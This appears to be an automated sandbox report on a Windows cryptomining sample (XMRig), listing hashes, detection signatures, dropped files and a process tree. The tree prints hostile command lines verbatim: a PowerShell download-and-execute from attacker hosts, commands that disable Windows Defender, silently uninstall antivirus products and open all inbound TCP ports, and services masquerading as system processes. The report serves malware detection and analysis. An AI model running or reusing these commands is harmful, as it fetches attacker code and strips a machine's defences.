Analysis
-
max time kernel
123s -
max time network
118s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
01-12-2021 18:08
General
-
Target
m2.dat.exe
-
Size
3.4MB
-
MD5
fcfc0feed527d188d6b2ed3445758511
-
SHA1
b4198d332b59b303e2dc5df717f2cf408b308f28
-
SHA256
28e5812c8bff42c348a5f25a5f3d871c5b3bbda882da1009db4d25dc974bef0c
-
SHA512
af053c75e89e18573161dcd1fcabc3b08998874c5e810bc15bb2a0e5ab0254d06b4ec6defc545fc9dff4fcb94529eb9ea7610ad63233e5d6e191b232c502d3c5
Malware Config
Extracted
http://k2ygoods.ydns.eu/power.txt
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner Payload 3 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 6 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 5 IoCs
-
Drops file in Windows directory 25 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Modifies data under HKEY_USERS 2 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\m2.dat.exe"C:\Users\Admin\AppData\Local\Temp\m2.dat.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\debug\m\n.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\debug\m\c1.bat" "3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\debug\m\lsass.exelsass.exe install "Windows Updata" winlogon.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\regedit.exeC:\Windows\regedit /s server.reg4⤵
- Runs .reg file with regedit
-
C:\PerfLogs\Admin\1sass.exeC:\PerfLogs\Admin\1sass.exe install "Windows Management" C:\PerfLogs\Admin\csrss.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\regedit.exeC:\Windows\regedit /s server2.reg4⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\sc.exesc start "Windows Updata"4⤵
-
C:\Windows\SysWOW64\sc.exesc start "Windows Management"4⤵
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\debug\m +h +a4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\debug\m\*.json +h +a +s +r4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\debug\m\*.exe +h +a +s +r4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib C:\PerfLogs\Admin\*.exe +h +a +s +r4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow4⤵
-
C:\Windows\debug\m\lsass.exeC:\Windows\debug\m\lsass.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\debug\m\winlogon.exe"winlogon.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\PerfLogs\Admin\1sass.exeC:\PerfLogs\Admin\1sass.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\PerfLogs\Admin\csrss.exe"C:\PerfLogs\Admin\csrss.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c "powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.ydns.eu/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://2652435.f3322.org/power.txt')"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.ydns.eu/power.txt')4⤵
- Blocklisted process makes network request
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%Eset%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%%Kaspersky%%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%avast%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%avp%'" call uninstall /nointeractive5⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%AntiVirus%'" call uninstall /nointeractive5⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%Norton Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart5⤵
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano5⤵
- Gathers network information
-
C:\Windows\system32\findstr.exe"C:\Windows\system32\findstr.exe" TCP5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" stop "Windows Updata"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" delete "Windows Updata"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" stop "Windows Management"5⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\PerfLogs\Admin\1sass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
C:\PerfLogs\Admin\1sass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
C:\PerfLogs\Admin\1sass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
C:\PerfLogs\Admin\csrss.exeMD5
62e98ca6b2bf484e6fbbc537fd49167a
SHA1b8fbfaaeadb02dde6461132bf63a9faa4a89987e
SHA256cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
SHA512684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
-
C:\PerfLogs\Admin\csrss.exeMD5
62e98ca6b2bf484e6fbbc537fd49167a
SHA1b8fbfaaeadb02dde6461132bf63a9faa4a89987e
SHA256cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
SHA512684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
-
C:\Windows\debug\m\c1.batMD5
9a412e42384f31ad8c61cbd32076603c
SHA17a1caef46f6c7549ab17d98f1328fff4673cacb2
SHA2560ab85d2da0f7a9b644d4b7a964a7b1728d1f9eb716b9abe2f1d9c611d7ee4617
SHA5121d9d179db2a8901539f3a7fe6a91d58422cdb6a28dbf53e758e8745881a45304b0037227b9a4d1c04928d14b0014a1bb1c2e6eb53dfa43111eba6bf32da949c6
-
C:\Windows\debug\m\config.jsonMD5
c3b273d977023f0309fa7225c73911ed
SHA1b667780303d60c649a77e8c2fed970779d8a53cf
SHA2563896eedd2bceeca958779c63c3150744c9e2d0160553b4d8a652323fe2b3b5df
SHA51238e8e637c58e59577a5e05e05fb6818ccba96b8db2cfda9e8221e1a0665429a321dc3efe603aa37afed7165267060382b213136076ebe3b4c536c8f060f026ea
-
C:\Windows\debug\m\config.jsonMD5
62fc8627fd89578bbf0d4dad13d010ce
SHA1d58965556828a215684cac6271a88472a37e74f9
SHA2565b70dcc71733725215b752a09c7434495554cd0183001af02fda4528425bbdf9
SHA512d9596a95e6cd13f745d618fd9865e50a3e04df26d780e4d6c6c9d3d2cac3b825258cb2c80a71922fca099d90605d4dd9de5ed6b91ac324efc3a966e3f43decc9
-
C:\Windows\debug\m\csrss.exeMD5
62e98ca6b2bf484e6fbbc537fd49167a
SHA1b8fbfaaeadb02dde6461132bf63a9faa4a89987e
SHA256cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
SHA512684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
-
C:\Windows\debug\m\lsass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
C:\Windows\debug\m\lsass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
C:\Windows\debug\m\lsass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
C:\Windows\debug\m\n.vbsMD5
c4258287aa2aa93135e6d1462b1cd58f
SHA116bdfae57a969931d2b7321dd48ec39dfbe8be14
SHA256cf8417cdc951eed2c10d424b312a0fbf222321e785e655548d9b054a2d87c273
SHA51238c701c8f50d35dd8319755d65e74849150bc3402afe2994a0eea9209ffde193ca6301ff28ad4e8b5ddb4cdd916f9a0e7ef4ef7e4e9c8b82ae28a2a3e76d75ba
-
C:\Windows\debug\m\server.regMD5
7c2301b0fa96dac6f800704acca36342
SHA1d5733429c9acee4e452bae53499fa67309beb855
SHA256f9f8291c7d3f5397e249aa6ec402ebc45d47cf455b25588970382048aa67b985
SHA512f754c1b848ff6eef49d60096c3a79a9120ddde80d812be2b6b751745cd008c3f2ffd0c82de23852a9153258d43ef8de7e1e30f4598a557ff7809ae476a75922f
-
C:\Windows\debug\m\server2.regMD5
41678ca725e5e2964ccfebde111d243a
SHA1451890c89b9268a321831ae0ca17cf128c973c2a
SHA2561b74416ba48010dad0467ce77f8d1044e75be2dd003a18cdad0d6f2112e3b565
SHA512b916c1321f4073da734c31bd6a50f1abb95592a4782977f09d73b986b867a3599f348bfbd3641d204a1882f4e3e84be7eb7254d5e4049e45279088172ab8ddad
-
C:\Windows\debug\m\winlogon.exeMD5
14404f2edef3c43d318fa8cab21b0ea6
SHA14f86639fd543555ba4604e0acb28c8631fe9c300
SHA25665127ac2b7fcda847872fa2314d4ef34620efc6d585551cebf2d4886d657c736
SHA512fccd70f3b3162a7f5f1d48fe0066ae0126bfbec92d51eb8b767db2d43ea919e9de9aa292013fc311503c2f567d1884143e08420048321ac0447771c3ad368624
-
C:\Windows\debug\m\winlogon.exeMD5
14404f2edef3c43d318fa8cab21b0ea6
SHA14f86639fd543555ba4604e0acb28c8631fe9c300
SHA25665127ac2b7fcda847872fa2314d4ef34620efc6d585551cebf2d4886d657c736
SHA512fccd70f3b3162a7f5f1d48fe0066ae0126bfbec92d51eb8b767db2d43ea919e9de9aa292013fc311503c2f567d1884143e08420048321ac0447771c3ad368624
-
\PerfLogs\Admin\1sass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
\PerfLogs\Admin\csrss.exeMD5
62e98ca6b2bf484e6fbbc537fd49167a
SHA1b8fbfaaeadb02dde6461132bf63a9faa4a89987e
SHA256cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
SHA512684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
-
\PerfLogs\Admin\csrss.exeMD5
62e98ca6b2bf484e6fbbc537fd49167a
SHA1b8fbfaaeadb02dde6461132bf63a9faa4a89987e
SHA256cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
SHA512684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
-
\Windows\debug\m\lsass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
\Windows\debug\m\winlogon.exeMD5
14404f2edef3c43d318fa8cab21b0ea6
SHA14f86639fd543555ba4604e0acb28c8631fe9c300
SHA25665127ac2b7fcda847872fa2314d4ef34620efc6d585551cebf2d4886d657c736
SHA512fccd70f3b3162a7f5f1d48fe0066ae0126bfbec92d51eb8b767db2d43ea919e9de9aa292013fc311503c2f567d1884143e08420048321ac0447771c3ad368624
-
memory/512-119-0x0000000000000000-mapping.dmp
-
memory/572-116-0x0000000000000000-mapping.dmp
-
memory/696-114-0x0000000000000000-mapping.dmp
-
memory/768-108-0x0000000000000000-mapping.dmp
-
memory/832-64-0x0000000000000000-mapping.dmp
-
memory/844-80-0x0000000000000000-mapping.dmp
-
memory/844-104-0x0000000000C80000-0x0000000000CA0000-memory.dmpFilesize
128KB
-
memory/844-105-0x0000000000CA0000-0x0000000000CC0000-memory.dmpFilesize
128KB
-
memory/844-83-0x0000000000110000-0x0000000000130000-memory.dmpFilesize
128KB
-
memory/908-87-0x0000000000000000-mapping.dmp
-
memory/924-60-0x0000000000000000-mapping.dmp
-
memory/1112-90-0x0000000000000000-mapping.dmp
-
memory/1156-91-0x0000000000000000-mapping.dmp
-
memory/1164-75-0x0000000000000000-mapping.dmp
-
memory/1188-117-0x0000000000000000-mapping.dmp
-
memory/1228-81-0x0000000000000000-mapping.dmp
-
memory/1252-113-0x0000000000000000-mapping.dmp
-
memory/1300-96-0x0000000000000000-mapping.dmp
-
memory/1408-109-0x0000000000000000-mapping.dmp
-
memory/1480-118-0x0000000000000000-mapping.dmp
-
memory/1484-122-0x0000000000000000-mapping.dmp
-
memory/1484-98-0x0000000000000000-mapping.dmp
-
memory/1488-56-0x0000000000000000-mapping.dmp
-
memory/1548-72-0x0000000000000000-mapping.dmp
-
memory/1620-111-0x0000000000000000-mapping.dmp
-
memory/1628-121-0x0000000000000000-mapping.dmp
-
memory/1660-115-0x0000000000000000-mapping.dmp
-
memory/1688-102-0x00000000011D2000-0x00000000011D4000-memory.dmpFilesize
8KB
-
memory/1688-99-0x000007FEFB6C1000-0x000007FEFB6C3000-memory.dmpFilesize
8KB
-
memory/1688-101-0x00000000011D0000-0x00000000011D2000-memory.dmpFilesize
8KB
-
memory/1688-103-0x00000000011D4000-0x00000000011D7000-memory.dmpFilesize
12KB
-
memory/1688-106-0x00000000011DB000-0x00000000011FA000-memory.dmpFilesize
124KB
-
memory/1688-94-0x0000000000000000-mapping.dmp
-
memory/1688-100-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmpFilesize
11.4MB
-
memory/1768-93-0x0000000000000000-mapping.dmp
-
memory/1968-55-0x0000000075F41000-0x0000000075F43000-memory.dmpFilesize
8KB
-
memory/1988-112-0x0000000000000000-mapping.dmp
-
memory/2024-62-0x0000000000000000-mapping.dmp
-
memory/2032-77-0x0000000000000000-mapping.dmp
-
memory/2040-70-0x0000000000000000-mapping.dmp
-
memory/2040-120-0x0000000000000000-mapping.dmp